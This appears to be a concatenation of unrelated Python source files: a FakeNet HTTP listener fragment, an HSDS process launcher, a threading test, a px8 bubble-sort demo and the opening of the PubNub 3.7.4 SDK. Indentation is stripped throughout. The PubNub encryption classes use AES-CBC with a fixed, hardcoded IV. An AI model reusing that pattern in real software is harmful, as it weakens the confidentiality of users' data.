response = "<html><head><title>FakeNet</title><body><h1>FakeNet</h1></body></html>"
response_type = 'text/html'
if path[-1] == '/':
response_type = 'text/html'
path += 'index.html'
else:
_, ext = posixpath.splitext(path)
response_type = self.server.extensions_map.get(ext, 'text/html')
response_filename = os.path.join(self.server.webroot_path, path[1:])
# Check the requested path exists
if not os.path.exists(response_filename):
self.server.logger.debug('Could not find path: %s', response_filename)
# Try default MIME file
response_filename = os.path.join(self.server.webroot_path, MIME_FILE_RESPONSE.get(response_type, 'FakeNet.html'))
# Check default MIME file exists
if not os.path.exists(response_filename):
self.server.logger.debug('Could not find path: %s', response_filename)
self.server.logger.error('Could not locate requested file or default handler.')
return (response, response_type)
self.server.logger.info('Responding with mime type: %s file: %s', response_type, response_filename)
try:
f = open(response_filename, 'rb')
except Exception, e:
self.server.logger.error('Failed to open response file: %s', response_filename)
response_type = 'text/html'
else:
response = f.read()
f.close()
return (response, response_type)
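# Resolution order: a trailing "/" maps to index.html under the webroot; the
# extension picks the MIME type via extensions_map; if the file is missing,
# the per-MIME default from MIME_FILE_RESPONSE (e.g. FakeNet.html) is served.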
def log_message(self, format, *args):
return
###############################################################################
# Testing code
def test(config):
import requests
url = "%s://localhost:%s" % ('http' if config.get('usessl') == 'No' else 'https', int(config.get('port', 8080)))
print "\t[HTTPListener] Testing HEAD request."
print '-'*80
print requests.head(url, verify=False, stream=True).text
print '-'*80
print "\t[HTTPListener] Testing GET request."
print '-'*80
print requests.get(url, verify=False, stream=True).text
print '-'*80
print "\t[HTTPListener] Testing POST request."
print '-'*80
print requests.post(url, {'param1':'A'*80, 'param2':'B'*80}, verify=False, stream=True).text
print '-'*80
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '8443', 'usessl': 'Yes', 'webroot': '../defaultFiles' }
listener = HTTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main() |
hsds_app.py | import os
import sys
from pathlib import Path
import site
import signal
import subprocess
import time
import uuid
import queue
import threading
import logging
from shutil import which
# maximum allowed length of the socket directory path, if one is given
# Exceeding this can cause errors - see: https://github.com/HDFGroup/hsds/issues/129
MAX_SOCKET_DIR_PATH_LEN=64
def _enqueue_output(out, queue, loglevel):
for line in iter(out.readline, b''):
# filter lines by loglevel
words = line.split()
put_line = True
if loglevel != logging.DEBUG:
if len(words) >= 2:
# format should be "node_name log_level> msg"
level = words[1][:-1]
if loglevel == logging.INFO:
if level == "DEBUG":
put_line = False
elif loglevel == logging.WARN or loglevel == logging.WARNING:
if not level.startswith("WARN") and level != "ERROR":
put_line = False
elif loglevel == logging.ERROR:
if level != "ERROR":
put_line = False
if put_line:
queue.put(line)
logging.debug("enqueu_output close()")
out.close()
def get_cmd_dir():
"""Return directory where hsds console shortcuts are."""
hsds_shortcut = "hsds-servicenode"
user_bin_dir = os.path.join(site.getuserbase(), "bin")
if os.path.isdir(user_bin_dir):
logging.debug(f"userbase bin_dir: {user_bin_dir}")
if os.path.isfile(os.path.join(user_bin_dir, hsds_shortcut)):
logging.info(f"using cmd_dir: {user_bin_dir}")
return user_bin_dir
logging.debug(f"looking for {hsds_shortcut} in PATH env var folders")
cmd = which(hsds_shortcut, mode=os.F_OK | os.R_OK)
if cmd is not None:
cmd_dir = os.path.dirname(cmd)
logging.info(f"using cmd_dir: {cmd_dir}")
return cmd_dir
sys_bin_dir = os.path.join(sys.exec_prefix, "bin")
if os.path.isdir(sys_bin_dir):
logging.debug(f"sys bin_dir: {sys_bin_dir}")
if os.path.isfile(os.path.join(sys_bin_dir, hsds_shortcut)):
logging.info(f"using cmd_dir: {sys_bin_dir}")
return sys_bin_dir
# fall back to just use __file__.parent
bin_dir = Path(__file__).parent
logging.info(f"no userbase or syspath found - using: {bin_dir}")
return bin_dir
class HsdsApp:
"""
Class to initiate and manage sub-process HSDS service
"""
def __init__(self, username=None,
password=None, password_file=None, logger=None,
log_level=None, dn_count=1, logfile=None,
socket_dir=None, config_dir=None, readonly=False,
islambda=False):
"""
Initializer for class
"""
"""
# Using tempdir is causing a unicode exception
# See: https://bugs.python.org/issue32958
self._tempdir = tempfile.TemporaryDirectory()
tmp_dir = self._tempdir.name
"""
# create a random dirname if one is not supplied
if socket_dir:
if len(socket_dir) > MAX_SOCKET_DIR_PATH_LEN:
raise ValueError(f"length of socket_dir must be less than: {MAX_SOCKET_DIR_PATH_LEN}")
if socket_dir[-1] != '/':
socket_dir += '/'
else:
tmp_dir = "/tmp" # TBD: will this work on windows?
rand_name = uuid.uuid4().hex[:8]
socket_dir = f"{tmp_dir}/hs{rand_name}/" # TBD: use temp dir
self._dn_urls = []
self._socket_paths = []
self._processes = []
self._queues = []
self._threads = []
self._dn_count = dn_count
self._username = username
self._password = password
self._password_file = password_file
self._logfile = logfile
self._loglevel = log_level
self._readonly = readonly
self._islambda = islambda
self._ready = False
self._config_dir = config_dir
self._cmd_dir = get_cmd_dir()
if logger is None:
self.log = logging
else:
self.log = logger
if not os.path.isdir(socket_dir):
os.mkdir(socket_dir)
self.log.debug(f"HsdsApp init - Using socketdir: {socket_dir}")
# url-encode any slashes in the socket dir
socket_url = socket_dir.replace('/', "%2F")
for i in range(dn_count):
socket_name = f"dn_{(i+1)}.sock"
dn_url = f"http+unix://{socket_url}{socket_name}"
self._dn_urls.append(dn_url)
self._socket_paths.append(f"{socket_dir}{socket_name}")
# sort the ports so that node_number can be determined based on dn_url
self._dn_urls.sort()
self._endpoint = f"http+unix://{socket_url}sn_1.sock"
self._socket_paths.append(f"{socket_dir}sn_1.sock")
self._rangeget_url = f"http+unix://{socket_url}rangeget.sock"
self._socket_paths.append(f"{socket_dir}rangeget.sock")
@property
def endpoint(self):
return self._endpoint
@property
def ready(self):
return self._ready
def print_process_output(self):
""" print any queue output from sub-processes
"""
if self._logfile:
f = open(self._logfile, "a")
else:
f = sys.stdout
while True:
got_output = False
for q in self._queues:
try:
line = q.get_nowait() # or q.get(timeout=.1)
except queue.Empty:
pass # no output on this queue yet
else:
if isinstance(line, bytes):
# self.log.debug(line.decode("utf-8").strip())
f.write(line.decode("utf-8"))
else:
f.write(line)
got_output = True
if not got_output:
break # all queues empty for now
if self._logfile:
f.close()
def check_processes(self):
# self.log.debug("check processes")
self.print_process_output()
for p in self._processes:
if p.poll() is not None:
result = p.communicate()
msg = f"process {p.args[0]} ended, result: {result}"
self.log.warning(msg)
# TBD - restart failed process
def run(self):
""" startup hsds processes
"""
if self._processes:
# just check process state and restart if necessary
self.check_processes()
return
dn_urls_arg = ""
for dn_url in self._dn_urls:
if dn_urls_arg:
dn_urls_arg += ','
dn_urls_arg += dn_url
pout = subprocess.PIPE # will pipe to parent
# create processes for count dn nodes, sn node, and rangeget node
count = self._dn_count + 2 # plus 2 for rangeget proxy and sn
# set PYTHONUNBUFFERED so we can get any output immediately
os.environ["PYTHONUNBUFFERED"] = "1"
# TODO: don't modify parent process env, use os.environ.copy(), set, and popen(env=)
common_args = ["--standalone", ]
common_args.append(f"--dn_urls={dn_urls_arg}")
common_args.append(f"--rangeget_url={self._rangeget_url}")
common_args.append(f"--hsds_endpoint={self._endpoint}")
if self._islambda:
# base boto packages installed in AWS image conflicting with aiobotocore
# see: https://github.com/aio-libs/aiobotocore/issues/862
# This command line argument will tell the sub-processes to remove
# sitepackage libs from their path before importing aiobotocore
common_args.append("--removesitepackages")
# common_args.append("--server_name=Direct Connect (HSDS)")
common_args.append("--use_socket")
if self._readonly:
common_args.append("--readonly")
if self._config_dir:
common_args.append(f"--config-dir={self._config_dir}")
if self._loglevel:
common_args.append(f"--log_level={self._loglevel}")
py_exe = sys.executable
cmd_dir = self._cmd_dir  # located in __init__ via get_cmd_dir()
for i in range(count):
if i == 0:
# args for service node
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=sn",
"--log_prefix=sn "]
if self._username:
pargs.append(f"--hs_username={self._username}")
if self._password:
pargs.append(f"--hs_password={self._password}")
if self._password_file:
pargs.append(f"--password_file={self._password_file}")
else:
pargs.append("--password_file=")
pargs.append(f"--sn_url={self._endpoint}")
pargs.append("--logfile=sn1.log")
elif i == 1:
# args for rangeget node
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=rn",
"--log_prefix=rg "]
else:
node_number = i - 2 # start with 0
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=dn",
f"--log_prefix=dn{node_number+1} "]
pargs.append(f"--dn_urls={dn_urls_arg}")
pargs.append(f"--node_number={node_number}")
# logging.info(f"starting {pargs[0]}")
pargs.extend(common_args)
p = subprocess.Popen(pargs, bufsize=1, universal_newlines=True,
shell=False, stdout=pout)
self._processes.append(p)
# setup queue so we can check on process output without blocking
q = queue.Queue()
loglevel = self.log.root.level
t = threading.Thread(
target=_enqueue_output, args=(p.stdout, q, loglevel))
self._queues.append(q)
t.daemon = True # thread dies with the program
t.start()
self._threads.append(t)
# wait until the sockets are initialized
start_ts = time.time()
SLEEP_TIME = 0.1 # time to sleep between checking on socket connection
MAX_INIT_TIME = 10.0 # max time to wait for socket to be initialized
while True:
ready = 0
for socket_path in self._socket_paths:
if os.path.exists(socket_path):
ready += 1
if ready == count:
self.log.info("all processes ready!")
break
else:
self.log.debug(f"{ready}/{count} ready")
self.log.debug(f"sleeping for {SLEEP_TIME}")
time.sleep(SLEEP_TIME)
if time.time() > start_ts + MAX_INIT_TIME:
msg = f"failed to initialize after {MAX_INIT_TIME} seconds"
self.log.error(msg)
raise IOError(msg)
self.log.info(f"Ready after: {(time.time()-start_ts):4.2f} s")
self._ready = True
def stop(self):
""" terminate hsds processes
"""
if not self._processes:
return
now = time.time()
logging.info(f"hsds app stop at {now}")
for p in self._processes:
logging.info(f"sending SIGINT to {p.args[0]}")
p.send_signal(signal.SIGINT)
# wait for sub-processes to exit
SLEEP_TIME = 0.1 # time to sleep between checking on process state
MAX_WAIT_TIME = 10.0 # max time to wait for sub-process to terminate
start_ts = time.time()
while True:
is_alive = False
for p in self._processes:
if p.poll() is None:
is_alive = True
if is_alive:
logging.debug(f"still alive, sleep {SLEEP_TIME}")
time.sleep(SLEEP_TIME)
else:
logging.debug("all subprocesses exited")
break
if time.time() > start_ts + MAX_WAIT_TIME:
msg = f"failed to terminate after {MAX_WAIT_TIME} seconds"
self.log.error(msg)
break
# kill any processes that are still reluctant to die
for p in self._processes:
if p.poll() is None:
logging.info(f"terminating {p.args[0]}")
p.terminate()
self._processes = []
self._threads = []
def __del__(self):
""" cleanup class resources """
self.stop()
# self._tempdir.cleanup()
|
threaded_aftermain.py | from time import sleep
import threading
import numpy
def thread1():
# Main allocation after main thread exits:
sleep(0.5)
data = numpy.ones((1024, 1024, 70), dtype=numpy.uint8)
sleep(0.5)
threading.Thread(target=thread1).start()
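# The thread is non-daemon, so the interpreter keeps running after main()
# returns; the large numpy allocation above therefore happens only after the
# main thread has exited.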
def main():
sleep(0.1)
main()
|
px8_sort.py | px8 / python cartridge
version 1
__python__
# Educational examples to understand some algorithms
import random
import threading
import time
class Button(object):
def __init__(self, x, y, w, h, color, text):
self.x1 = x
self.y1 = y
self.x2 = x+w
self.y2 = y+h
self.color = color
self.text = text
self.clicked = False
def draw(self):
rectfill(self.x1, self.y1, self.x2, self.y2, self.color)
px8_print(self.text, self.x1+1, self.y1+1, 2)
def update(self, x, y):
self.clicked = False
if self.x1 <= x <= self.x2 and self.y1 <= y <= self.y2:
self.clicked = True
def is_click(self):
return self.clicked
def random_color():
return random.randint(1, 16)
class BubbleSort(object):
def __init__(self):
self.T = 0
self.alist = [(int(110*random.random()), i) for i in range(1, 16)]
t1 = threading.Thread(target=self.start_algorithm)
t1.start()
def init(self):
cls()
self.draw_list()
def update(self):
self.T += 1
def start_algorithm(self):
for passnum in range(len(self.alist)-1,0,-1):
for i in range(passnum):
if self.alist[i][0]>self.alist[i+1][0]:
self.alist[i], self.alist[i+1] = self.alist[i+1], self.alist[i]
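# brief pause after each comparison so each swap is visible in the draw loop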
time.sleep(0.2)
def draw_list(self):
idx = 4
for i in self.alist:
rect(idx, i[0], idx+8, 110, 0)
rectfill(idx+1, i[0], idx+7, 110, i[1])
idx += 8
def draw(self):
cls()
self.draw_list()
idx_demo = 0
demos = [
["BubbleSort", [BubbleSort()]],
]
buttons = []
buttons.append(Button(70, 118, 16, 8, 9, "run"))
buttons.append(Button(88, 118, 16, 8, 9, "next"))
def _init():
global demos, idx_demo
cls()
for demo in demos[idx_demo][1]:
demo.init()
def prev_demo():
global idx_demo, demos
idx_demo = (idx_demo-1) % len(demos)
pal()
for demo in demos[idx_demo][1]:
demo.init()
def next_demo():
global idx_demo, demos
idx_demo = (idx_demo+1) % len(demos)
pal()
for demo in demos[idx_demo][1]:
demo.init()
def _update():
global idx_demo, demos, buttons
_mouse_state = mouse_state()
if _mouse_state == 1:
_mouse_x = mouse_x()
_mouse_y = mouse_y()
for button in buttons:
button.update(_mouse_x, _mouse_y)
if button.is_click():
next_demo()
for demo in demos[idx_demo][1]:
demo.update()
def _draw():
global idx_demo, demos, buttons
for demo in demos[idx_demo][1]:
demo.draw()
for button in buttons:
button.draw()
px8_print("Demos " + demos[idx_demo][0], 0, 120, 2)
__gfx__
10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088088000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888887800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888888800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088888000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000008880000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000077007700777777007700000077000000777777000000000770007700777777007777770077000000777700000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770007700770077007700770077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770707700770077007700770077000000770077000000000000000000000000000000000
00000000077777700777700007700000077000000770077000000000777777700770077007777000077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000777077700770077007700770077000000770077000000000000000000000000000000000
00000000077007700777777007777770077777700777777000000000770007700777777007700770077777700777777000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(__gfx__, __gff__ and __map__ sections contain only all-zero default rows; elided)
__sfx__
0110000000472004620c3400c34318470004311842500415003700c30500375183750c3000c3751f4730c375053720536211540114330c37524555247120c3730a470163521d07522375164120a211220252e315
01100000183732440518433394033c65539403185432b543184733940318433394033c655306053940339403184733940318423394033c655394031845321433184733940318473394033c655394033940339403
01100000247552775729755277552475527755297512775524755277552b755277552475527757297552775720755247572775524757207552475227755247522275526757297552675722752267522975526751
01100000001750c055003550c055001750c055003550c05500175180650c06518065001750c065003650c065051751106505365110650c17518075003650c0650a145160750a34516075111451d075113451d075
011000001b5771f55722537265171b5361f52622515265121b7771f76722757267471b7461f7362271522712185771b5571d53722517187361b7261d735227122454527537295252e5171d73514745227452e745
01100000275422754227542275422e5412e5452b7412b5422b5452b54224544245422754229541295422954224742277422e7422b7422b5422b5472954227542295422b742307422e5422e7472b547305462e742
0110000030555307652e5752b755295622e7722b752277622707227561297522b072295472774224042275421b4421b5451b5421b4421d542295471d442295422444624546245472444727546275462944729547
0110000000200002000020000200002000020000200002000020000200002000020000200002000020000200110171d117110171d227131211f227130371f2370f0411b1470f2471b35716051221571626722367
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e775000002e1752e075000002e1752e77500000
(remaining __sfx__ slots are identical empty default rows; elided)
__music__
00 00044208
00 00044108
00 00010304
00 00010304
01 00010203
00 00010203
00 00010305
00 00010306
00 00010305
00 00010306
00 00010245
02 00010243
(remaining __music__ rows are identical default "00 41424344" entries; elided)
|
pubnub.py |
## www.pubnub.com - PubNub Real-time push service in the cloud.
# coding=utf8
## PubNub Real-time Push APIs and Notifications Framework
## Copyright (c) 2014-15 Stephen Blum
## http://www.pubnub.com/
## -----------------------------------
## PubNub 3.7.4 Real-time Push Cloud API
## -----------------------------------
try:
import json
except ImportError:
import simplejson as json
import time
import hashlib
import uuid as uuid_lib
import random
import sys
import copy
from base64 import urlsafe_b64encode
from base64 import encodestring, decodestring
import hmac
from Crypto.Cipher import AES
try:
from hashlib import sha256
digestmod = sha256
except ImportError:
import Crypto.Hash.SHA256 as digestmod
sha256 = digestmod.new
##### vanilla python imports #####
try:
from urllib.parse import quote
except ImportError:
from urllib2 import quote
try:
import urllib.request
except ImportError:
import urllib2
try:
import requests
from requests.adapters import HTTPAdapter
except ImportError:
pass
#import urllib
import socket
import threading
try:
# HTTPConnection is a class in urllib3.connection, not a submodule
from urllib3.connection import HTTPConnection
default_socket_options = list(HTTPConnection.default_socket_options)
except (ImportError, AttributeError):
default_socket_options = []
default_socket_options += [
# Enable TCP keepalive
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
]
if sys.platform.startswith("linux"):
default_socket_options += [
# Send first keepalive packet 200 seconds after last data packet
(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 200),
# Resend keepalive packets every second, when unanswered
(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),
# Close the socket after 5 unanswered keepalive packets
(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
]
elif sys.platform.startswith("darwin"):
# From /usr/include/netinet/tcp.h
# idle time used when SO_KEEPALIVE is enabled
socket.TCP_KEEPALIVE = socket.TCP_KEEPALIVE \
if hasattr(socket, 'TCP_KEEPALIVE') \
else 0x10
# interval between keepalives
socket.TCP_KEEPINTVL = socket.TCP_KEEPINTVL \
if hasattr(socket, 'TCP_KEEPINTVL') \
else 0x101
# number of keepalives before close
socket.TCP_KEEPCNT = socket.TCP_KEEPCNT \
if hasattr(socket, 'TCP_KEEPCNT') \
else 0x102
default_socket_options += [
# Send first keepalive packet 200 seconds after last data packet
(socket.IPPROTO_TCP, socket.TCP_KEEPALIVE, 200),
# Resend keepalive packets every second, when unanswered
(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),
# Close the socket after 5 unanswered keepalive packets
(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
]
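# Illustrative note (not part of the SDK): urllib3 applies these
# (level, optname, value) tuples with socket.setsockopt() when it
# builds a connection, roughly:
#
#   for level, optname, value in default_socket_options:
#       sock.setsockopt(level, optname, value)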
"""
# The Windows code is currently untested
elif sys.platform.startswith("win"):
import struct
from urllib3.connectionpool import HTTPConnectionPool, HTTPSConnectionPool
def patch_socket_keepalive(conn):
conn.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
# Enable TCP keepalive
1,
# Send first keepalive packet 200 seconds after last data packet
200,
# Resend keepalive packets every second, when unanswered
1
))
class PubnubHTTPConnectionPool(HTTPConnectionPool):
def _validate_conn(self, conn):
super(PubnubHTTPConnectionPool, self)._validate_conn(conn)
class PubnubHTTPSConnectionPool(HTTPSConnectionPool):
def _validate_conn(self, conn):
super(PubnubHTTPSConnectionPool, self)._validate_conn(conn)
import urllib3.poolmanager
urllib3.poolmanager.pool_classes_by_scheme = {
'http' : PubnubHTTPConnectionPool,
'https' : PubnubHTTPSConnectionPool
}
"""
##################################
##### Tornado imports and globals #####
try:
import tornado.httpclient
import tornado.ioloop
from tornado.stack_context import ExceptionStackContext
ioloop = tornado.ioloop.IOLoop.instance()
except ImportError:
pass
#######################################
##### Twisted imports and globals #####
try:
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol
from twisted.web.client import Agent, ContentDecoderAgent
from twisted.web.client import RedirectAgent, GzipDecoder
from twisted.web.client import HTTPConnectionPool
from twisted.web.http_headers import Headers
from twisted.internet.ssl import ClientContextFactory
import twisted
pnconn_pool = HTTPConnectionPool(reactor, persistent=True)
pnconn_pool.maxPersistentPerHost = 100000
pnconn_pool.cachedConnectionTimeout = 15
pnconn_pool.retryAutomatically = True
class WebClientContextFactory(ClientContextFactory):
def getContext(self, hostname, port):
return ClientContextFactory.getContext(self)
class PubNubPamResponse(Protocol):
def __init__(self, finished):
self.finished = finished
def dataReceived(self, bytes):
self.finished.callback(bytes)
class PubNubResponse(Protocol):
def __init__(self, finished):
self.finished = finished
def dataReceived(self, bytes):
self.finished.callback(bytes)
except ImportError:
pass
#######################################
def get_data_for_user(data):
try:
if 'message' in data and 'payload' in data:
return {'message': data['message'], 'payload': data['payload']}
else:
return data
except TypeError:
return data
class PubnubCrypto2():
def pad(self, msg, block_size=16):
padding = block_size - (len(msg) % block_size)
return msg + chr(padding) * padding
def depad(self, msg):
return msg[0:-ord(msg[-1])]
def getSecret(self, key):
return hashlib.sha256(key).hexdigest()
def encrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
enc = encodestring(cipher.encrypt(self.pad(msg)))
return enc
def decrypt(self, key, msg):
try:
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
plain = self.depad(cipher.decrypt(decodestring(msg)))
except:
return msg
try:
return json.loads(plain)
except ValueError:  # json.loads signals non-JSON input with ValueError
return plain
class PubnubCrypto3():
def pad(self, msg, block_size=16):
padding = block_size - (len(msg) % block_size)
return msg + (chr(padding) * padding).encode('utf-8')
def depad(self, msg):
return msg[0:-ord(msg[-1])]
def getSecret(self, key):
return hashlib.sha256(key.encode("utf-8")).hexdigest()
def encrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
return encodestring(
cipher.encrypt(self.pad(msg.encode('utf-8')))).decode('utf-8')
def decrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
return (cipher.decrypt(
decodestring(msg.encode('utf-8')))).decode('utf-8')
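# Illustrative round trip (assumes PyCrypto is installed; 'demo_key'
# is a placeholder cipher key, not an SDK constant):
#
#   pc = PubnubCrypto3()
#   ciphertext = pc.encrypt('demo_key', '"hello"')
#   plaintext = pc.depad(pc.decrypt('demo_key', ciphertext))
#   assert plaintext == '"hello"'
#
# Note that decrypt() returns the still-padded plaintext, so callers
# are expected to depad() the result themselves.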
class PubnubBase(object):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=False,
cipher_key=False,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
"""Pubnub Class
Provides methods to communicate with Pubnub cloud
Attributes:
publish_key: Publish Key
subscribe_key: Subscribe Key
secret_key: Secret Key
cipher_key: Cipher Key
auth_key: Auth Key (used with Pubnub Access Manager i.e. PAM)
ssl_on: SSL enabled?
origin: Origin
"""
self.origin = origin
self.version = '3.7.4'
self.limit = 1800
self.publish_key = publish_key
self.subscribe_key = subscribe_key
self.secret_key = secret_key
self.cipher_key = cipher_key
self.ssl = ssl_on
self.auth_key = auth_key
self.STATE = {}
self.http_debug = None
if self.ssl:
self.origin = 'https://' + self.origin
else:
self.origin = 'http://' + self.origin
self.uuid = uuid or str(uuid_lib.uuid4())
if type(sys.version_info) is tuple:
self.python_version = 2
self.pc = PubnubCrypto2()
else:
if sys.version_info.major == 2:
self.python_version = 2
self.pc = PubnubCrypto2()
else:
self.python_version = 3
self.pc = PubnubCrypto3()
if not isinstance(self.uuid, str):
raise AttributeError("uuid must be a string")
def set_http_debug(self, func=None):
self.http_debug = func
def _pam_sign(self, msg):
sign = urlsafe_b64encode(hmac.new(
self.secret_key.encode("utf-8"),
msg.encode("utf-8"),
sha256
).digest())
return quote(sign, safe="")
def set_u(self, u=False):
self.u = u
def _pam_auth(self, query, apicode=0, callback=None, error=None):
if 'timestamp' not in query:
query['timestamp'] = int(time.time())
## Global Grant?
if 'auth' in query and not query['auth']:
del query['auth']
if 'channel' in query and not query['channel']:
del query['channel']
if 'channel-group' in query and not query['channel-group']:
del query['channel-group']
params = "&".join([
x + "=" + quote(
str(query[x]), safe=""
) for x in sorted(query)
])
sign_input = "{subkey}\n{pubkey}\n{apitype}\n{params}".format(
subkey=self.subscribe_key,
pubkey=self.publish_key,
apitype="audit" if (apicode) else "grant",
params=params
)
query['signature'] = self._pam_sign(sign_input)
return self._request({"urlcomponents": [
'v1', 'auth', "audit" if (apicode) else "grant",
'sub-key',
self.subscribe_key
], 'urlparams': query},
self._return_wrapped_callback(callback),
self._return_wrapped_callback(error),
encoder_map={'signature': self._encode_pam})
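# For reference, the string signed above has the canonical PAM form
# (values shown are placeholders):
#
#   <subscribe_key>\n<publish_key>\ngrant\nchannel=my_channel&r=1&timestamp=...&w=0
#
# i.e. the sub key, pub key, api type ("grant" or "audit") and the
# alphabetically sorted, url-encoded query string, joined by newlines.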
def get_origin(self):
return self.origin
def set_auth_key(self, auth_key):
self.auth_key = auth_key
def get_auth_key(self):
return self.auth_key
def grant(self, channel=None, channel_group=None, auth_key=False,
read=False, write=False, manage=False, ttl=5, callback=None,
error=None):
"""Method for granting permissions.
This function establishes subscribe and/or write permissions for
PubNub Access Manager (PAM) by setting the read or write attribute
to true. A grant with read or write set to false (or not included)
will revoke any previous grants with read or write set to true.
Permissions can be applied to any one of three levels:
1. Application level privileges are based on subscribe_key applying
to all associated channels.
2. Channel level privileges are based on a combination of
subscribe_key and channel name.
3. User level privileges are based on the combination of
subscribe_key, channel and auth_key.
Args:
channel: (string) (optional)
Specifies channel name to grant permissions to.
If channel/channel_group is not specified, the grant
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to grant permissions to multiple channels
simultaneously by specifying the channels
as a comma separated list.
channel_group: (string) (optional)
Specifies channel group name to grant permissions to.
If channel/channel_group is not specified, the grant
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to grant permissions to multiple channel
groups simultaneously by specifying the channel groups
as a comma separated list.
auth_key: (string) (optional)
Specifies auth_key to grant permissions to.
It is possible to specify multiple auth_keys as comma
separated list in combination with a single channel
name. If auth_key is provided as the special-case
value "null" (or included in a comma-separated list,
eg. "null,null,abc"), a new auth_key will be generated
and returned for each "null" value.
read: (boolean) (default: False)
Read permissions are granted by setting to True.
Read permissions are removed by setting to False.
write: (boolean) (default: False)
Write permissions are granted by setting to True.
Write permissions are removed by setting to False.
manage: (boolean) (default: False)
Manage permissions are granted by setting to True.
Manage permissions are removed by setting to False.
ttl: (int) (default: 5)
Time in minutes for which granted permissions are
valid. Max is 525600, min is 1.
Setting ttl to 0 will apply the grant indefinitely.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or tornado
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or tornado
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given
The dict returned contains values with keys 'message' and 'payload'
Sample Response:
{
"message":"Success",
"payload":{
"ttl":5,
"auths":{
"my_ro_authkey":{"r":1,"w":0}
},
"subscribe_key":"my_subkey",
"level":"user",
"channel":"my_channel"
}
}
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'r': read and 1 or 0,
'w': write and 1 or 0,
'm': manage and 1 or 0,
'ttl': ttl,
'pnsdk': self.pnsdk
}, callback=callback, error=error)
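# Illustrative usage (assumes a Pubnub instance constructed with a
# valid secret_key; channel and auth_key names are placeholders):
#
#   response = pubnub.grant(channel='my_channel',
#                           auth_key='my_ro_authkey',
#                           read=True, write=False, ttl=5)
#   # sync mode -> {'message': 'Success', 'payload': {...}}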
def revoke(self, channel=None, channel_group=None, auth_key=None, ttl=1,
